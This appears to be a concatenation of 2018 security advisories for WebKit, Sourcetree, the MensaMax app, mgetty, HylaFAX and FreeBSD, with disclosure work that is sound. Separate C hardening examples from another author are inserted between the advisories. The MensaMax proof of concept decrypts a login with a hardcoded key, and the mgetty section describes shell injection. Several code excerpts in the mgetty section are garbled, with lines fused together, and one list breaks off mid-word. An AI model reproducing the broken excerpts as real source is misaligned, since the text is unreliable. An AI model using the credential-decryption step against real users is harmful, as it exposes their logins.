    Credit to Yu Haiwan and Wu Hongjun from Nanyang Technological University working with Trend Micro's Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4376
    Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0.
    Credit to 010 working with Trend Micro's Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4378
    Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0.
    Credit to an anonymous researcher, zhunki of 360 ESG Codesafe Team.
    Processing maliciously crafted web content may lead to code execution.
    A memory corruption issue was addressed with improved validation.

CVE-2018-4382
    Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0.
    Credit to lokihardt of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4386
    Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1.
    Credit to lokihardt of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4392
    Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0.
    Credit to zhunki of 360 ESG Codesafe Team.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4416
    Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0.
    Credit to lokihardt of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases.

Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/.

The WebKitGTK+ and WPE WebKit team,
November 21, 2018
October 2018 Sourcetree Advisory
This email refers to the advisory found at https://confluence.atlassian.com/display/SOURCETREEKB/Sourcetree+Security+Advisory+2018-10-31 .

CVE ID:
* CVE-2018-13396.
* CVE-2018-13397.

Product: Sourcetree.

Affected Sourcetree product versions:
1.0b2 <= version < 3.0.0 (Sourcetree for macOS)
0.5.1.0 <= version < 3.0.0 (Sourcetree for Windows)

Fixed Sourcetree product versions:
* for macOS, Sourcetree 3.0.0 has been released with a fix for these issues.
* for Windows, Sourcetree 3.0.0 has been released with a fix for these issues.

Summary:
This advisory discloses critical severity security vulnerabilities. Versions of Sourcetree are affected by these vulnerabilities.
Customers who have upgraded Sourcetree to version 3.0.0 (Sourcetree for macOS) or 3.0.0 (Sourcetree for Windows) are not affected.
Customers who have downloaded and installed Sourcetree >= 1.0b2 but less than 3.0.0 (the fixed version for macOS) or who have downloaded and installed Sourcetree >= 0.5.1.0 but less than 3.0.0 (the fixed version for Windows), please upgrade your Sourcetree installations immediately to fix these vulnerabilities.

Sourcetree for macOS - Git submodules vulnerability (CVE-2018-13396)

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
The embedded version of Git used in Sourcetree for macOS was vulnerable to CVE-2018-13396. An attacker can exploit this issue if they can commit to a Git repository linked in Sourcetree for macOS. This allows them to execute arbitrary code on systems running a vulnerable version of Sourcetree for macOS.
Versions of Sourcetree for macOS starting with version 1.0b2 before version 3.0.0 are affected by this vulnerability.
This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREE-5985 .

Sourcetree for Windows - Git submodules vulnerability (CVE-2018-13397)

Severity:
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment.

Description:
The embedded version of Git used in Sourcetree for Windows was vulnerable to CVE-2018-13397. An attacker can exploit this issue if they can commit to a Git repository linked in Sourcetree for Windows. This allows them to execute arbitrary code on systems running a vulnerable version of Sourcetree for Windows.
Versions of Sourcetree for Windows starting with version 0.5.1.0 before version 3.0.0 are affected by this vulnerability.
This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREEWIN-9077 .

Fix:
To address these issues, we've released the following versions containing a fix:
* Sourcetree version 3.0.0 (Sourcetree for macOS)
* Sourcetree version 3.0.0 (Sourcetree for Windows)

Remediation:
Upgrade Sourcetree to version 3.0.0 (macOS or Windows) or higher.
The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately.
For a full description of the latest version of Sourcetree, see the release notes found at https://product-downloads.atlassian.com/software/sourcetree/ReleaseNotes/Sourcetree_3.0.html . You can download the latest version of Sourcetree from the download centre found at https://www.sourcetreeapp.com/ .

Acknowledgements:
Atlassian would like to credit Terry Zhang at Tophant for reporting these issues to us.
e2 Security GmbH Advisory 2018-01: MensaMax Android app / Unencrypted transmission and usage of hardcoded encryption key
## e2 Security GmbH Advisory 2018-01 ##
### Unencrypted transmission and usage of hardcoded encryption key ###

Overview
~~~~~~~~
Advisory ID: E2SA-2018-01
Advisory Version: 1.0
Advisory Status: Public
Advisory URL: https://advisories.e2security.de/2018/E2SA-2018-01.txt
Affected Product: MensaMax Android app
Affected Version: 4.3
Vendor: Breustedt GmbH, https://mensamax.de
Credits: Stefan Pietsch, e2 Security GmbH

Issue Details
#############
1) The MensaMax Android application uses plain HTTP to communicate with the web server. Authentication information is transmitted in plain text with an HTTP GET request. An attacker is able to eavesdrop on the communication between the application and the server because the transport layer is not encrypted.
Severity: High
CVSS Score: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)
CVE ID: CVE-2018-15752
CWE ID: CWE-319

2) The MensaMax Android application encrypts the login username and password with a static DES key. The key is hardcoded in the Android application file. An attacker is able to retrieve the encryption key from the apk file and decrypt the login credentials retrieved from the unencrypted HTTP transmission.
Severity: High
CVSS Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE ID: CVE-2018-15753
CWE ID: CWE-321

PoC (Proof of Concept)
######################
Sample HTTP request with invalid credentials:
~~~
GET /MM_Android/Service1.svc/getURLVonProjekt/GtBWTDhwry4=,s7eTGwGP_h0=,N9NkXQvJkIQ=,iDZZxd4IXZ0=,A3smkmlKRzw=,mensahome HTTP/1.1
Host: mensahome.de
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
~~~
The GET parameters are Base64 encoded and encrypted with a static DES key.
~~~
# echo "N9NkXQvJkIQ=" | openssl enc -a -des-ecb -d -K 436f65653130
user1
~~~

Solution and Workaround
#######################
Do not use the MensaMax Android app until a fixed version is released.
History
#######
2018-08-10: Issue found
2018-08-13: Initial Vendor contact, Issue details reported to Vendor
2018-08-15: Vendor acknowledged vulnerabilities
2018-08-23: CVE IDs added
2018-10-01: Advisory published
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0007
------------------------------------------------------------------------
WebKitGTK+ and WPE WebKit Security Advisory                  WSA-2018-0007
------------------------------------------------------------------------

Date reported           : September 26, 2018
Advisory ID             : WSA-2018-0007
WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0007.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0007.html
CVE identifiers         : CVE-2018-4207, CVE-2018-4208, CVE-2018-4209,
                          CVE-2018-4210, CVE-2018-4212, CVE-2018-4213,
                          CVE-2018-4191, CVE-2018-4197, CVE-2018-4299,
                          CVE-2018-4306, CVE-2018-4309, CVE-2018-4311,
                          CVE-2018-4312, CVE-2018-4314, CVE-2018-4315,
                          CVE-2018-4316, CVE-2018-4317, CVE-2018-4318,
                          CVE-2018-4319, CVE-2018-4323, CVE-2018-4328,
                          CVE-2018-4358, CVE-2018-4359, CVE-2018-4361.

Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit.

CVE-2018-4207
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Google OSS-Fuzz.
    Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks.

CVE-2018-4208
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Google OSS-Fuzz.
    Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks.

CVE-2018-4209
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Google OSS-Fuzz.
    Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks.

CVE-2018-4210
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Google OSS-Fuzz.
    Unexpected interaction with indexing types caused a failure. An array indexing issue existed in the handling of a function in JavaScriptCore. This issue was addressed with improved checks.

CVE-2018-4212
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Google OSS-Fuzz.
    Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks.

CVE-2018-4213
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to Google OSS-Fuzz.
    Unexpected interaction causes an ASSERT failure. This issue was addressed with improved checks.

CVE-2018-4191
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Google OSS-Fuzz.
    Unexpected interaction causes an ASSERT failure. A memory corruption issue was addressed with improved validation.

CVE-2018-4197
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Ivan Fratric of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management.

CVE-2018-4299
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Samuel Groß (saelo) working with Trend Micro's Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4306
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Ivan Fratric of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management.

CVE-2018-4309
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to an anonymous researcher working with Trend Micro's Zero Day Initiative.
    A malicious website may be able to execute scripts in the context of another website. A cross-site scripting issue existed in WebKit. This issue was addressed with improved URL validation.

CVE-2018-4311
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Erling Alf Ellingsen (@steike).
    Cross-origin SecurityErrors include the accessed frame's origin. The issue was addressed by removing origin information.

CVE-2018-4312
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Ivan Fratric of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management.

CVE-2018-4314
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Ivan Fratric of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management.

CVE-2018-4315
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Ivan Fratric of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution. A use after free issue was addressed with improved memory management.

CVE
X41 D-Sec GmbH Security Advisory X41-2018-007: Multiple Vulnerabilities in mgetty
X41 D-Sec GmbH Security Advisory: X41-2018-007
Multiple Vulnerabilities in mgetty
==================================

Overview
--------
Confirmed Affected Versions: 1.2.0
Patched Versions: 1.2.1
Vendor: mgetty
Vendor URL: http://mgetty.greenie.net
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-007-mgetty

Summary and Impact
------------------
Multiple issues have been identified in the mgetty fax software. These might be used by local users to elevate their privileges.
X41 did not perform a full test or audit on the software.

Product Description
-------------------
From the vendor:
For those of you that do not know mgetty+sendfax yet: it's a reliable and proven fax send and receive solution for unix and Linux. But it can do much more... so read the docs and be surprised.

Shell injection via faxq-helper
===============================
Severity Rating: Medium
Vector: Fax Job
CVE: CVE-2018-16741
CWE: 78
CVSS Score: 6.1
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

In fax/faxq-helper.c function do_activate(), not all characters are properly sanitized to prevent command injection. It is possible to use ||, && or > to change the control flow.

{% highlight c %}
/* replace all quote characters, backslash and ';' by ' ' */
for( q = buf; *q != '\0'; q++ )
{
    if ( *q == '\'' || *q == '"' || *q == '`' || *q == '\\' || *q == ';' )
    {
        *q = ' ';
    }
}
{% endhighlight %}

A job file containing malicious input can be constructed using faxq-helper activate. Once faxrunq is started, the code is executed as the user running the command.

{% highlight bash %}
/* replace all quote characters, backslash and ';' by '' */ # " '\$ ; command=tr -d '\042\047\140\134\044\073' (pwd ? 0 : 1)) badlogin(tbuf); failures = 0; } (void)strcpy(tbuf, username);
{% endhighlight %}

Stack Based Buffer Overflow With Long Argument in contrib/scrts.c
=================================================================
Severity Rating: Low
Vector: Command Line Parameter
CVE: CVE-2018-16742
CWE: 121
CVSS Score: 2.9
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

In file contrib/scrts.c a stack buffer overflow can be triggered via a command line parameter.

{% highlight c %}
int main( int argc, char ** argv )
{
    int i, fd;
    struct termios tio;
    char device[1000];

    for ( i=1; i/dev/null 2>&1", MAILER, mailto );
    pipefp = popen( buf, "w" );
{% endhighlight %}

Endless loop in g3/g32pbm.c
===========================
When converting g32 files using g3/g32pbm.c, an endless loop can be triggered by a malformed input file. An example can be found at files/g32pmbinfiniteloop.

Out Of Bounds Access in g3/pbm2g3.c
===================================
When converting pbm files using g3/pbm2g3.c, out of bounds accesses can occur with malformed input files in putwhitespan(). An example can be found with files/pbm2g2oobaccess.

{% highlight c %}
putcode( twhite[l].bitcode, twhite[l].bitlength );
{% endhighlight %}

Workaround
----------
None.

Timeline
--------
2018-06-07 Issues found
2018-08-27 Issue reported to vendor
2018-08-28 Vendor reply
2018-09-08 Vendor sends patches
2018-09-08 CVE IDs requested
2018-09-09 CVE IDs assigned
2018-09-11 Patched Version released
2018-09-11 Advisory released

About X41 D-SEC GmbH
--------------------
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.

X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier
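The faxq-helper issue above is a denylist that blanks a few characters and leaves the rest; this added example (not mgetty's code, all names hypothetical) sets that filter beside an allowlist check that rejects any field containing characters a shell could interpret, which is the usual hardening for data that ends up in a popen()/system() command line.

```c
/* Added example, not from mgetty: denylist filter vs. allowlist check for
 * strings that will be embedded in a shell command line. Function names
 * (denylist_filter, allowlist_ok, ...) are this example's own. */
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Mirrors the sanitizer quoted in the advisory: replaces a fixed set of
 * characters by a space and leaves everything else unchanged. */
static void denylist_filter(char *buf)
{
    for (char *q = buf; *q != '\0'; q++) {
        if (*q == '\'' || *q == '"' || *q == '`' || *q == '\\' || *q == ';')
            *q = ' ';
    }
}

/* Does the string still contain one of the shell operators the advisory
 * names as surviving the filter ("||", "&&", ">")? */
static bool has_shell_operator(const char *s)
{
    return strstr(s, "||") != NULL || strstr(s, "&&") != NULL ||
           strchr(s, '>') != NULL;
}

/* Allowlist: accept only characters a job field legitimately needs (the
 * exact set is an assumption for this example). Anything else, including
 * every shell metacharacter, is rejected outright instead of "cleaned". */
bool allowlist_ok(const char *s)
{
    if (*s == '\0')
        return false;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (!(isalnum(c) || c == '.' || c == '-' || c == '_' ||
              c == '@' || c == '+'))
            return false;
    }
    return true;
}

/* True when the denylist leaves a shell operator in place that the
 * allowlist would have refused, i.e. the gap the advisory describes. */
bool denylist_misses_operator(const char *input)
{
    char buf[256];
    strncpy(buf, input, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    denylist_filter(buf);
    return has_shell_operator(buf) && !allowlist_ok(input);
}
```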
X41 D-Sec GmbH Security Advisory X41-2018-008: Multiple Vulnerabilities in HylaFAX
X41 D-SEC GmbH Security Advisory: X41-2018-008
Multiple Vulnerabilities in HylaFAX
===================================

Overview
--------
Confirmed Affected Versions: HylaFAX 6.0.6, HylaFAX+ 5.6.0
Confirmed Patched Versions: HylaFAX 6.0.7, HylaFAX+ 5.6.1
Vendor: Hylafax, Hylafax+
Vendor URL: https://www.hylafax.org/, http://hylafax.sourceforge.net/
Credit: X41 D-SEC GmbH, Luis Merino, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-008-Hylafax/

Summary and Impact
------------------
Severity Rating: Critical
Vector: Incoming fax call
CVE: CVE-2018-17141
CWE: 122, 457
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Multiple bugs were found in the code handling fax page reception in JPEG format that allow arbitrary writes to an uninitialized pointer by remote parties dialing in. When processing a specially crafted input, the issue could lead to remote code execution.
Although JPEG reception is not announced as an available capability by HylaFAX and is explicitly disabled during capabilities announcement, there is code for JPEG support in HylaFAX that can be reached by a remote party when setting certain flags during session negotiation.
X41 did not perform a full test or audit on the software.

Product Description
-------------------
HylaFAX is an open-source system for sending and receiving faxes using one or multiple fax modems.

Analysis
--------
X41 discovered several vulnerabilities in HylaFAX that are exploitable by local or remote attackers.

Uninitialized pointer write in FaxModem::writeECMData()
-------------------------------------------------------
In CopyQuality.c++:990 recvRow is initialized only when params.jp is exactly JP_GREY or JP_COLOR and also params.df is exactly zero.

{% highlight c %}
uint dataform = params.df + (params.jp ? params.jp + 4 : 0);
//...
switch (dataform) {
//...
case JPGREY+4:
case JPCOLOR+4:
    recvEOLCount = 0;
    recvRow = (u_char*) malloc(1024*1000);    // 1M should do it?
{% endhighlight %}

However, later in the same function recvRow is used as a target for memcpy() when params.jp is JP_GREY or JP_COLOR, irrespective of params.df. Consequently, if a sender crafts a DCS signal that leads to params.df being non-zero while params.jp is JP_GREY or JP_COLOR, then recvRow will be uninitialized when it is used as a target for memcpy().

{% highlight c %}
if (params.jp != JPGREY && params.jp != JPCOLOR) {
    flushRawData(tif, 0, (const u_char*) buf, cc);
} else {
    memcpy(recvRow, (const char*) buf, cc);
    recvRow += cc;
}
{% endhighlight %}

Out of bounds write in FaxModem::writeECMData()
-----------------------------------------------
The same piece of code for memcpy at CopyQuality.c++:1045 can be abused to perform an out of bounds write to recvRow, as there is no bounds check before writing to and incrementing recvRow. This can lead to remote code execution when an attacker sends a specially crafted input.

Out of bounds write in FaxModem::recvPageDLEData()
--------------------------------------------------
CopyQuality.c++:446 presents another unbounded memcpy that can be abused to perform an out of bounds write to recvRow.

{% highlight c %}
if (n >= RCVBUFSIZ)
    flushRawData(tif, 0, (const u_char*) raw, n);
else {
    memcpy(recvRow, (const char*) raw, n);
    recvRow += n;
}
{% endhighlight %}

The code doesn't seem to be reachable, as the JPEG flag forces ECM reception.

Workaround
----------
None.

Timeline
--------
2018-06-07 Issues found
2018-08-24 Issue reported to vendor
2018-09-02 Vendor sends patches
2018-09-17 CVE ID assigned
2018-09-18 Patches released
2018-09-19 Advisory released

External links
--------------
See https://www.x41-dsec.de/lab/blog/fax/ for a blog post related to this advisory.

About X41 D-SEC GmbH
--------------------
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.

X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier
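Both HylaFAX findings come from the same pattern: a bare pointer that is sometimes never allocated and a memcpy that never checks remaining space. The following added example (not HylaFAX code; the recvbuf_* names are this example's own) shows the hardened form, where pointer, capacity and fill level travel together so both failure modes are rejected before any byte is written.

```c
/* Added example, not from HylaFAX: a receive buffer that cannot be written
 * through an unallocated pointer or past its end. Modelled on the
 * recvRow/memcpy pattern quoted in the advisory; names are assumptions. */
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Page buffer for JPEG (JP_GREY/JP_COLOR) reception. The buffer is either
 * allocated with a known capacity, or data is NULL and both sizes are 0. */
typedef struct {
    unsigned char *data;  /* NULL until recvbuf_init() succeeds */
    size_t cap;           /* bytes allocated */
    size_t len;           /* bytes written so far */
} recvbuf_t;

/* Allocate once, before any page data is accepted. Returns false so the
 * caller can abort the session instead of continuing with a NULL pointer. */
bool recvbuf_init(recvbuf_t *rb, size_t cap)
{
    rb->data = NULL;
    rb->cap = 0;
    rb->len = 0;
    if (cap == 0)
        return false;
    rb->data = malloc(cap);
    if (rb->data == NULL)
        return false;
    rb->cap = cap;
    return true;
}

/* Bounds-checked replacement for "memcpy(recvRow, buf, cc); recvRow += cc;".
 * A false return means the page must be abandoned as a protocol error. */
bool recvbuf_append(recvbuf_t *rb, const unsigned char *src, size_t cc)
{
    if (rb->data == NULL)        /* never allocated: the uninitialised-pointer case */
        return false;
    if (cc > rb->cap - rb->len)  /* does not fit: the out-of-bounds case */
        return false;
    memcpy(rb->data + rb->len, src, cc);
    rb->len += cc;
    return true;
}

void recvbuf_free(recvbuf_t *rb)
{
    free(rb->data);
    rb->data = NULL;
    rb->cap = rb->len = 0;
}

/* Exercises both failure modes on constructed input and returns how many
 * chunks were correctly rejected (expected: 2). */
int recvbuf_demo(void)
{
    static const unsigned char chunk[64] = { 0 };  /* constructed sample data */
    int rejected = 0;
    recvbuf_t rb;

    /* 1. A dataform path that never allocated the buffer: append must fail. */
    rb.data = NULL;
    rb.cap = rb.len = 0;
    if (!recvbuf_append(&rb, chunk, sizeof chunk))
        rejected++;

    /* 2. Allocated for two chunks; the third byte after that must fail. */
    if (recvbuf_init(&rb, 2 * sizeof chunk)) {
        recvbuf_append(&rb, chunk, sizeof chunk);
        recvbuf_append(&rb, chunk, sizeof chunk);
        if (!recvbuf_append(&rb, chunk, 1))
            rejected++;
        recvbuf_free(&rb);
    }
    return rejected;
}
```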
FreeBSD Security Advisory FreeBSD-SA-18:12.elf
=============================================================================
FreeBSD-SA-18:12.elf                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Improper ELF header parsing

Category:       core
Module:         kernel
Announced:      2018-09-12
Credits:        Thomas Barabosch, Fraunhofer FKIE; Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2018-09-12 05:02:11 UTC (stable/11, 11.1-STABLE)
                2018-09-12 05:07:35 UTC (releng/11.2, 11.2-RELEASE-p3)
                2018-09-12 05:07:35 UTC (releng/11.1, 11.1-RELEASE-p14)
                2018-09-12 05:03:30 UTC (stable/10, 10.4-STABLE)
                2018-09-12 05:07:35 UTC (releng/10.4, 10.4-RELEASE-p12)
CVE Name:       CVE-2018-6924

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

To execute a binary the kernel must parse the ELF header to determine the
entry point address, the program interpreter, and other parameters.

II.  Problem Description

Insufficient validation was performed in the ELF header parser, and
malformed or otherwise invalid ELF binaries were not rejected as they
should be.

III. Impact

Execution of a malicious ELF binary may result in a kernel crash or may
disclose kernel memory.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch
# fetch https://security.FreeBSD.org/patches/SA-18:12/elf.patch.asc
# gpg --verify elf.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r338605
releng/10.4/                                                      r338606
stable/11/                                                        r338604
releng/11.1/                                                      r338606
releng/11.2/                                                      r338606
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6924>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:12.elf.asc>
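The advisory says the kernel must parse the ELF header for the entry point and interpreter and that malformed headers were not rejected. As an added example (not FreeBSD kernel code; the layout constants are the standard ELF64 ones, the function names and the sample image are this example's own), here is the shape of a strict validator: every offset and size is checked against the file length before it is used, and a constructed minimal image is mutated three ways to show each rejection.

```c
/* Added example, not from FreeBSD: strict validation of an in-memory ELF64
 * little-endian image before any field is trusted. Names are assumptions. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define EH_SIZE   64   /* sizeof(Elf64_Ehdr) */
#define PH_SIZE   56   /* sizeof(Elf64_Phdr) */
#define PT_INTERP 3

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return (uint32_t)rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32); }

/* Returns 0 if the image passes, otherwise a small code naming the first
 * failed check (useful for logging why a binary was refused). */
int elf64_validate(const uint8_t *img, size_t len)
{
    if (len < EH_SIZE) return 1;                        /* truncated header */
    if (memcmp(img, "\x7f" "ELF", 4) != 0) return 2;    /* bad magic */
    if (img[4] != 2) return 3;                          /* EI_CLASS: ELFCLASS64 only */
    if (img[5] != 1) return 4;                          /* EI_DATA: little-endian only */
    if (img[6] != 1 || rd32(img + 20) != 1) return 5;   /* EI_VERSION / e_version */
    uint16_t type = rd16(img + 16);
    if (type != 2 && type != 3) return 6;               /* ET_EXEC or ET_DYN */
    if (rd16(img + 52) != EH_SIZE) return 7;            /* e_ehsize */
    uint64_t phoff = rd64(img + 32);
    uint16_t phentsize = rd16(img + 54);
    uint16_t phnum = rd16(img + 56);
    if (phentsize != PH_SIZE) return 8;
    if (phnum == 0) return 9;
    /* Bound the whole table against the file; phoff may be arbitrary. */
    uint64_t phtab = (uint64_t)phnum * PH_SIZE;
    if (phoff > len || phtab > len - phoff) return 10;  /* table outside file */
    /* The interpreter path must lie inside the file and end in NUL. */
    for (uint16_t i = 0; i < phnum; i++) {
        const uint8_t *ph = img + phoff + (size_t)i * PH_SIZE;
        if (rd32(ph) != PT_INTERP) continue;
        uint64_t off = rd64(ph + 8), fsz = rd64(ph + 32);
        if (off > len || fsz == 0 || fsz > len - off) return 12;
        if (img[off + fsz - 1] != '\0') return 13;
    }
    return 0;
}

/* Builds a constructed minimal image (header, one PT_INTERP phdr, the
 * interpreter string) and optionally corrupts it. Returns image length. */
size_t build_sample(uint8_t *buf, int variant)
{
    static const char interp[] = "/libexec/ld-elf.so.1";  /* FreeBSD's rtld path */
    const size_t interp_off = EH_SIZE + PH_SIZE;
    size_t total = interp_off + sizeof interp;            /* includes the NUL */
    memset(buf, 0, total);
    memcpy(buf, "\x7f" "ELF", 4);
    buf[4] = 2; buf[5] = 1; buf[6] = 1;                   /* 64-bit, LE, v1 */
    buf[16] = 2;                                          /* ET_EXEC */
    buf[18] = 0x3e;                                       /* EM_X86_64 */
    buf[20] = 1;                                          /* e_version */
    buf[24] = 0x00; buf[25] = 0x10; buf[26] = 0x40;       /* e_entry 0x401000 */
    buf[32] = EH_SIZE;                                    /* e_phoff */
    buf[52] = EH_SIZE;                                    /* e_ehsize */
    buf[54] = PH_SIZE;                                    /* e_phentsize */
    buf[56] = 1;                                          /* e_phnum */
    uint8_t *ph = buf + EH_SIZE;
    ph[0] = PT_INTERP;
    ph[8] = (uint8_t)interp_off;                          /* p_offset */
    ph[32] = (uint8_t)sizeof interp;                      /* p_filesz */
    memcpy(buf + interp_off, interp, sizeof interp);
    if (variant == 1) ph[8] = 0xff;          /* interpreter offset past end of file */
    if (variant == 2) buf[32] = 0xff;        /* program header table past end of file */
    if (variant == 3) buf[total - 1] = 'x';  /* interpreter path not NUL-terminated */
    return total;
}

/* Convenience wrapper: build variant N and validate it. */
int validate_variant(int variant)
{
    uint8_t buf[256];
    size_t len = build_sample(buf, variant);
    return elf64_validate(buf, len);
}
```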
FreeBSD Security Advisory FreeBSD-SA-18:11.hostapd
=============================================================================
FreeBSD-SA-18:11.hostapd                                    Security Advisory
                                                          The FreeBSD Project

Topic:          Unauthenticated EAPOL-Key Decryption Vulnerability

Category:       contrib
Module:         wpa
Announced:      2018-08-14
Credits:        Mathy Vanhoef of the imec-DistriNet research group of KU Leuven
Affects:        All supported versions of FreeBSD.
